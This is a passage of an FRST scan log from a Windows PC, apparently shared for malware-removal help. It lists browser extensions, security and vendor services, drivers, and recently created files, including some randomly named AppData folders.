HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [chfdnecihphmhljaaejmgoiahnihplgn] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mbckjcfnjmoiinpgddefodcighgikkgn] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] - hxxp://clients2.google.com/service/update2/crx ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S2 AVG Antivirus; C:\Program Files (x86)\AVG\Antivirus\AVGSvc.exe [282536 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 AVG Firewall; C:\Program Files (x86)\AVG\Antivirus\afwServ.exe [331952 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgbIDSAgent; C:\Program Files (x86)\AVG\Antivirus\x64\aswidsagenta.exe [7496672 2017-10-20] (AVG Technologies CZ, s.r.o.) S2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1428656 2017-10-31] (AVG Technologies CZ, s.r.o.) S2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [8063656 2017-10-31] (Microsoft Corporation) S2 Dell Customer Connect; C:\Program Files (x86)\Dell Customer Connect\DCCService.exe [130936 2017-09-19] (Dell Inc.) S2 Dell Foundation Services; C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [97616 2017-01-11] (Dell) S2 DellDataVault; C:\Program Files\Dell\DellDataVault\DellDataVault.exe [2571352 2016-01-05] (Dell Inc.) S2 DellUpdate; C:\Program Files (x86)\Dell Update\DellUpService.exe [230248 2017-05-01] (Dell Inc.) S2 Garmin Device Interaction Service; C:\Program Files (x86)\Garmin\Device Interaction Service\GarminService.exe [1099280 2017-03-28] (Garmin Ltd. or its subsidiaries) S2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [14696 2013-07-30] (Intel Corporation) S2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [382456 2017-03-13] (Intel Corporation) S2 Intel(R) Capability Licensing Service Interface; c:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed] S3 Intel(R) Capability Licensing Service TCP IP Interface; c:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation) S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-12-09] (Intel Corporation) S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6058960 2017-08-21] (Malwarebytes) S2 Net Driver HPZ12; C:\Windows\System32\HPZinw12.dll [50688 2015-10-30] (HP Inc.) [File not signed] S2 Pml Driver HPZ12; C:\Windows\System32\HPZipm12.dll [66048 2015-10-30] (HP Inc.) [File not signed] S2 RapportMgmtService; C:\Program Files (x86)\Trusteer\Rapport\bin\RapportMgmtService.exe [2350064 2017-09-28] (IBM Corp.) S4 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [312056 2015-08-04] (Realtek Semiconductor) S4 Seagate Dashboard Services; C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe [16216 2015-07-15] (Seagate Technology LLC) S4 Seagate MobileBackup Service; C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\MobileService.exe [143656 2015-07-15] (Seagate Technology LLC) S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-18] (Microsoft Corporation) S4 SftService; C:\Program Files (x86)\Dell Backup and Recovery\sftservice.exe [2065808 2016-01-04] (SoftThinks SAS) S4 SupportAssistAgent; C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe [31928 2016-04-22] (Dell Inc.) S2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [5906704 2017-07-26] (AVG Technologies CZ, s.r.o.) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation) S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-07-11] (Microsoft Corporation) S4 ZAtheros Wlan Agent; C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [81536 2014-05-13] (Atheros) [File not signed] ===================== Drivers (Whitelisted) ====================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R3 athr; C:\WINDOWS\System32\drivers\athw10x.sys [4599728 2017-02-22] (Qualcomm Atheros Communications, Inc.) S3 avgbdisk; C:\WINDOWS\system32\drivers\avgbdiska.sys [166624 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgbidsdriver; C:\WINDOWS\system32\drivers\avgbidsdrivera.sys [314640 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgbidsh; C:\WINDOWS\system32\drivers\avgbidsha.sys [192584 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgblog; C:\WINDOWS\system32\drivers\avgbloga.sys [336896 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgbuniv; C:\WINDOWS\system32\drivers\avgbuniva.sys [51336 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgHwid; C:\WINDOWS\system32\drivers\avgHwid.sys [39424 2017-10-20] (AVG Technologies CZ, s.r.o.) S2 avgMonFlt; C:\WINDOWS\system32\drivers\avgMonFlt.sys [140192 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgNetSec; C:\WINDOWS\system32\drivers\avgNetSec.sys [548568 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgRdr; C:\WINDOWS\system32\drivers\avgRdr2.sys [102792 2017-10-20] (AVG Technologies CZ, s.r.o.) S0 avgRvrt; C:\WINDOWS\system32\drivers\avgRvrt.sys [76832 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgSnx; C:\WINDOWS\system32\drivers\avgSnx.sys [1022288 2017-10-26] (AVG Technologies CZ, s.r.o.) S1 avgSP; C:\WINDOWS\system32\drivers\avgSP.sys [579584 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgStm; C:\WINDOWS\system32\drivers\avgStm.sys [193768 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 avgVmm; C:\WINDOWS\system32\drivers\avgVmm.sys [355856 2017-10-20] (AVG Technologies CZ, s.r.o.) S3 DDDriver; C:\WINDOWS\system32\drivers\DDDriver64Dcsa.sys [32464 2016-01-05] (Dell Computer Corporation) S3 DellProf; C:\WINDOWS\system32\drivers\DellProf.sys [24240 2016-01-05] (Dell Computer Corporation) R3 dot4; C:\WINDOWS\system32\DRIVERS\Dot4.sys [146856 2013-06-04] (Windows (R) Win 7 DDK provider) S3 Dot4Print; C:\WINDOWS\System32\drivers\Dot4Prt.sys [21928 2013-06-04] (Windows (R) Win 7 DDK provider) S3 epmntdrv; C:\WINDOWS\system32\epmntdrv.sys [33448 2016-12-07] () S3 epmntdrv; C:\WINDOWS\SysWOW64\epmntdrv.sys [21496 2016-01-14] () S1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77440 2017-10-07] () S3 EuGdiDrv; C:\WINDOWS\system32\EuGdiDrv.sys [10848 2016-07-11] () [File not signed] S3 EuGdiDrv; C:\WINDOWS\SysWOW64\EuGdiDrv.sys [10208 2016-07-11] () [File not signed] S2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [192952 2017-10-07] (Malwarebytes) S3 MBAMFarflt; C:\WINDOWS\system32\DRIVERS\farflt.sys [110016 2017-11-04] (Malwarebytes) S3 MBAMProtection; C:\WINDOWS\system32\DRIVERS\mbam.sys [45504 2017-11-04] (Malwarebytes) S3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [252232 2017-11-04] (Malwarebytes) S3 MBAMWebProtection; C:\WINDOWS\system32\DRIVERS\mwac.sys [94144 2017-11-10] (Malwarebytes) R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [100312 2013-12-09] (Intel Corporation) S1 RapportAegle64; C:\Program Files (x86)\Trusteer\Rapport\bin\x64\RapportAegle64.sys [384312 2017-09-28] (IBM Corp.) S1 RapportCerberus_1804077; C:\ProgramData\Trusteer\Rapport\store\exts\RapportCerberus\baseline\RapportCerberus64_1804077.sys [1271448 2017-10-01] (IBM Corp.) S1 RapportEI64; C:\Program Files (x86)\Trusteer\Rapport\bin\x64\RapportEI64.sys [585432 2017-09-28] (IBM Corp.) S0 RapportHades64; C:\WINDOWS\System32\Drivers\RapportHades64.sys [253912 2017-09-28] (IBM Corp.) S0 RapportKE64; C:\WINDOWS\System32\Drivers\RapportKE64.sys [507960 2017-09-28] (IBM Corp.) S1 RapportPG64; C:\Program Files (x86)\Trusteer\Rapport\bin\x64\RapportPG64.sys [610616 2017-09-28] (IBM Corp.) R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [896752 2016-12-15] (Realtek ) R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [402136 2015-06-10] (Realsil Semiconductor Corporation) S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] () S3 TuneUpUtilitiesDrv; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [32304 2016-06-01] (AVG Netherlands B.V.) S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation) S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation) S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation) U3 idsvc; no ImagePath ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2017-11-10 16:13 - 2017-11-10 16:15 - 000030648 _____ C:\Users\Charlie\Desktop\FRST.txt 2017-11-10 16:13 - 2017-11-10 16:13 - 000000000 ____D C:\FRST 2017-11-10 16:12 - 2017-11-10 16:12 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job 2017-11-10 16:11 - 2017-11-10 16:13 - 000109624 _____ C:\WINDOWS\ntbtlog.txt 2017-11-10 14:41 - 2017-11-10 14:42 - 002403328 _____ (Farbar) C:\Users\Charlie\Desktop\FRST64.exe 2017-11-10 11:20 - 2017-11-10 11:20 - 000000000 ____D C:\Users\Charlie\AppData\Local\Uxuve 2017-11-10 11:20 - 2017-11-10 11:20 - 000000000 ____D C:\Users\Charlie\AppData\Local\Eflowubub 2017-11-10 11:20 - 2017-11-10 11:20 - 000000000 ____D C:\Users\Charlie\AppData\Local\Aqiqliqoc 2017-11-04 11:49 - 2017-11-04 11:49 - 006547783 _____ C:\Users\Charlie\Downloads\bulletin-2431508949036.pdf 2017-11-03 10:07 - 2017-11-03 10:07 - 001434164 _____ C:\Users\Charlie\Downloads\PubsHandler.ashx 2017-11-03 09:01 - 2017-11-07 11:42 - 000000000 ____D C:\Users\Charlie\AppData\Local\Uwtes 2017-11-03 08:35 - 2017-11-03 08:35 - 000000000 ____D C:\Users\Charlie\AppData\Local\Asjam 2017-10-30 16:04 - 2017-10-30 16:11 - 007791398 _____ C:\Users\Charlie\Documents\IMG_20171030_0001.pdf 2017-10-25 20:38 - 2017-10-25 20:38 - 000389384 _____ C:\Users\Charlie\Downloads\viewDownload.go 2017-10-25 13:41 - 2017-10-25 13:41 - 000000000 ____D C:\Program Files (x86)\Dell Customer Connect 2017-10-24 09:46 - 2017-10-24 09:46 - 000210369 _____ C:\Users\Charlie\Downloads\YearEndSummary_2017(1).pdf 2017-10-24 09:37 - 2017-10-24 09:37 - 000210358 _____ C:\Users\Charlie\Downloads\YearEndSummary_2017.pdf 2017-10-24 09:36 - 2017-10-24 09:36 - 000146457 _____ C:\Users\Charlie\Downloads\YearEndSummary_2016.pdf 2017-10-24 09:33 - 2017-10-24 09:33 - 000514225 _____ C:\Users\Charlie\Downloads\retrievedocument.pdf 2017-10-24 09:24 - 2017-11-01 09:55 - 000031361 _____ C:\Users\Charlie\Desktop\Checks 1000.xlsx 2017-10-20 14:00 - 2017-10-20 14:00 - 000028249 _____ C:\Users\Charlie\Documents\IMG_20171020_0001.pdf 2017-10-20 13:44 - 2017-10-20 13:44 - 000209448 _____ C:\Users\Charlie\Downloads\birth cert appl_20170627.pdf 2017-10-20 06:24 - 2017-10-20 06:24 - 000402608 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\avgBoot.exe 2017-10-17 19:52 - 2017-10-17 19:52 - 000096098 _____ C:\Users\Charlie\Downloads\amsler_grid_eye_test.pdf 2017-10-17 07:02 - 2017-10-17 07:03 - 001361928 _____ C:\Users\Charlie\Downloads\ElfPDFStream (2).pdf 2017-10-14 10:45 - 2017-10-14 10:45 - 005668817 _____ C:\Users\Charlie\Downloads\bulletin-2431507128193.pdf 2017-10-14 10:44 - 2017-10-14 10:44 - 005108757 _____ C:\Users\Charlie\Downloads\bulletin-2431507727521.pdf 2017-10-14 10:44 - 2017-10-14 10:44 - 005108757 _____ C:\Users\Charlie\Downloads\bulletin-2431507727521(1).pdf 2017-10-13 14:07 - 2017-09-30 00:45 - 000511896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbhub.sys 2017-10-13 14:07 - 2017-09-30 00:40 - 000173976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbccgp.sys 2017-10-13 14:07 - 2017-09-29 21:29 - 001408536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll 2017-10-13 14:07 - 2017-09-29 21:29 - 000804784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll 2017-10-13 14:07 - 2017-09-29 21:26 - 001333136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll 2017-10-13 14:07 - 2017-09-29 21:26 - 001292872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll 2017-10-13 14:07 - 2017-09-29 21:10 - 001839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll 2017-10-13 14:07 - 2017-09-29 21:10 - 000606072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll 2017-10-13 14:07 - 2017-09-29 21:10 - 000508344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll 2017-10-13 14:07 - 2017-09-29 21:10 - 000480920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll 2017-10-13 14:07 - 2017-09-29 21:09 - 002259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll 2017-10-13 14:07 - 2017-09-29 21:09 - 000787712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll 2017-10-13 14:07 - 2017-09-29 21:06 - 004471368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe 2017-10-13 14:07 - 2017-09-29 21:05 - 005827744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll 2017-10-13 14:07 - 2017-09-29 21:05 - 002603744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneCoreUAPCommonProxyStub.dll 2017-10-13 14:07 - 2017-09-29 21:05 - 001266544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll 2017-10-13 14:07 - 2017-09-29 21:05 - 000750488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe 2017-10-13 14:07 - 2017-09-29 21:05 - 000559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe 2017-10-13 14:07 - 2017-09-29 21:04 - 004215184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll 2017-10-13 14:07 - 2017-09-29 21:04 - 000612120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll 2017-10-13 14:07 - 2017-09-29 21:04 - 000519680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll 2017-10-13 14:07 - 2017-09-29 21:04 - 000438096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll 2017-10-13 14:07 - 2017-09-29 21:04 - 000347544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll 2017-10-13 14:07 - 2017-09-29 21:04 - 000182680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll 2017-10-13 14:07 - 2017-09-29 21:03 - 020373408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll 2017-10-13 14:07 - 2017-09-29 21:03 - 006768288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll 2017-10-13 14:07 - 2017-09-29 21:03 - 001439032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll 2017-10-13 14:07 - 2017-09-29 21:02 - 001624096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Uev.AppAgent.dll 2017-10-13 14:07 - 2017-09-29 21:02 - 001517464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppVEntSubsystems32.dll 2017-10-13 14:07 - 2017-09-29 21:01 - 000124544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll 2017-10-13 14:07 - 2017-09-29 02:45 - 002953216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys 2017-10-13 14:07 - 2017-09-29 02:43 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll 2017-10-13 14:07 - 2017-09-29 02:42 - 000018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mgmtapi.dll 2017-10-13 14:07 - 2017-09-29 02:41 - 013844992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll 2017-10-13 14:07 - 2017-09-29 02:41 - 000110080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BitLockerCsp.dll 2017-10-13 14:07 - 2017-09-29 02:40 - 006728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll 2017-10-13 14:07 - 2017-09-29 02:40 - 000371200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll 2017-10-13 14:07 - 2017-09-29 02:40 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll 2017-10-13 14:07 - 2017-09-29 02:39 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll 2017-10-13 14:07 - 2017-09-29 02:38 - 005721600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll 2017-10-13 14:07 - 2017-09-29 02:38 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll 2017-10-13 14:07 - 2017-09-29 02:38 - 001135616 ____R (The ICU Project) C:\WINDOWS\SysWOW64\icuuc.dll 2017-10-13 14:07 - 2017-09-29 02:38 - 000498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Uev.Office2013CustomActions.dll 2017-10-13 14:07 - 2017-09-29 02:38 - 000471040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll 2017-10-13 14:07 - 2017-09-29 02:38 - 000463360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webio.dll 2017-10-13 14:07 - 2017-09-29 02:38 - 000370688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll 2017-10-13 14:07 - 2017-09-29 02:38 - 000308224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptngc.dll 2017-10-13 14:07 - 2017-09-29 02:37 - 000306688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.dll 2017-10-13 14:07 - 2017-09-29 02:37 - 000038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerUI.dll 2017-10-13 14:07 - 2017-09-29 02:36 - 000590336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PCPKsp.dll 2017-10-13 14:07 - 2017-09-29 02:34 - 002859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2017-10-13 14:07 - 2017-09-29 02:34 - 000798720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll 2017-10-13 14:07 - 2017-09-29 02:34 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll 2017-10-13 14:07 - 2017-09-29 02:34 - 000434176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.dll 2017-10-13 14:07 - 2017-09-29 02:33 - 007598080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll 2017-10-13 14:07 - 2017-09-29 02:33 - 004559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll 2017-10-13 14:07 - 2017-09-29 02:33 - 001506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll 2017-10-13 14:07 - 2017-09-29 02:32 - 002782720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll 2017-10-13 14:07 - 2017-09-29 02:32 - 002340864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll 2017-10-13 14:07 - 2017-09-29 02:32 - 001627136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2017-10-13 14:07 - 2017-09-29 02:32 - 001244160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Phone.dll 2017-10-13 14:07 - 2017-09-29 02:32 - 000035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys 2017-10-13 14:07 - 2017-09-29 02:31 - 003107328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe 2017-10-13 14:07 - 2017-09-29 02:29 - 001460736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll 2017-10-13 14:07 - 2017-09-29 02:29 - 001318912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll 2017-10-13 14:07 - 2017-09-29 02:29 - 000157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll 2017-10-13 14:07 - 2017-09-29 02:28 - 000681472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll 2017-10-13 14:07 - 2017-09-29 02:28 - 000473088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll 2017-10-13 14:07 - 2017-09-29 02:28 - 000297984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mcbuilder.exe 2017-10-13 14:07 - 2017-09-29 02:28 - 000104448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Robocopy.exe 2017-10-13 14:07 - 2017-09-29 02:28 - 000040448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cipher.exe 2017-10-13 14:07 - 2017-09-29 02:24 - 003377664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll 2017-10-13 14:07 - 2017-09-18 18:09 - 000554400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS 2017-10-13 14:07 - 2017-09-18 17:20 - 000049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tetheringclient.dll 2017-10-13 14:07 - 2017-09-18 17:15 - 000648704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll 2017-10-13 14:06 - 2017-09-30 00:52 - 001595152 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll 2017-10-13 14:06 - 2017-09-30 00:51 - 001458320 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll 2017-10-13 14:06 - 2017-09-30 00:51 - 001147288 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe 2017-10-13 14:06 - 2017-09-30 00:51 - 000661224 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll 2017-10-13 14:06 - 2017-09-30 00:50 - 001346112 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll 2017-10-13 14:06 - 2017-09-30 00:50 - 001068208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll 2017-10-13 14:06 - 2017-09-30 00:50 - 001024920 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe 2017-10-13 14:06 - 2017-09-30 00:49 - 001004136 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll 2017-10-13 14:06 - 2017-09-30 00:49 - 000777400 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll 2017-10-13 14:06 - 2017-09-30 00:49 - 000135576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys 2017-10-13 14:06 - 2017-09-30 00:48 - 008319384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2017-10-13 14:06 - 2017-09-30 00:48 - 002399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll 2017-10-13 14:06 - 2017-09-30 00:48 - 002327448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys 2017-10-13 14:06 - 2017-09-30 00:48 - 000644696 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll 2017-10-13 14:06 - 2017-09-30 00:47 - 002969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll 2017-10-13 14:06 - 2017-09-30 00:47 - 001194792 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll 2017-10-13 14:06 - 2017-09-30 00:44 - 000712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys 2017-10-13 14:06 - 2017-09-30 00:44 - 000181912 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll 2017-10-13 14:06 - 2017-09-30 00:43 - 007318888 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll 2017-10-13 14:06 - 2017-09-30 00:43 - 002442136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys 2017-10-13 14:06 - 2017-09-30 00:42 - 004848952 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe 2017-10-13 14:06 - 2017-09-30 00:42 - 001506712 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll 2017-10-13 14:06 - 2017-09-30 00:42 - 000820120 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe 2017-10-13 14:06 - 2017-09-30 00:41 - 005477600 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll 2017-10-13 14:06 - 2017-09-30 00:41 - 005304496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll 2017-10-13 14:06 - 2017-09-30 00:41 - 002086808 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll 2017-10-13 14:06 - 2017-09-30 00:41 - 000961944 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll 2017-10-13 14:06 - 2017-09-30 00:41 - 000654976 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll 2017-10-13 14:06 - 2017-09-30 00:41 - 000651672 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe 2017-10-13 14:06 - 2017-09-30 00:41 - 000259400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe 2017-10-13 14:06 - 2017-09-30 00:41 - 000257432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll 2017-10-13 14:06 - 2017-09-30 00:41 - 000228248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys 2017-10-13 14:06 - 2017-09-30 00:40 - 000849816 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVClient.exe 2017-10-13 14:06 - 2017-09-30 00:40 - 000724704 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll 2017-10-13 14:06 - 2017-09-30 00:40 - 000701336 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVCatalog.dll 2017-10-13 14:06 - 2017-09-30 00:40 - 000642680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys 2017-10-13 14:06 - 2017-09-30 00:40 - 000558912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll 2017-10-13 14:06 - 2017-09-30 00:40 - 000408984 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll 2017-10-13 14:06 - 2017-09-30 00:40 - 000336320 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe 2017-10-13 14:06 - 2017-09-30 00:40 - 000184728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys 2017-10-13 14:06 - 2017-09-30 00:40 - 000072944 _____ (Microsoft Corporation) 